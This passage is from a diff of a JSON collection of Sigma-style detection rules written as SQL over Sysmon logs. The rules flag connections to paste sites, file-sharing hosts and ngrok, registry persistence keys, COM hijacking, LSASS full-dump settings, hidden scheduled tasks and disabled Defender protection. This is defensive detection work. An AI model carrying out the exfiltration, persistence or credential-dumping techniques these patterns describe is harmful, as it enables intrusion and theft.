DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate use of ngrok" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", + "status": "experimental", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", "attack.defense_evasion", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "status": "test", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate Addin Installation" + "Legitimate application that needs to do a full dump of their process" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", @@ -33005,334 +32721,371 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "status": "experimental", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + }, + { + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", - "author": "frack113", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual 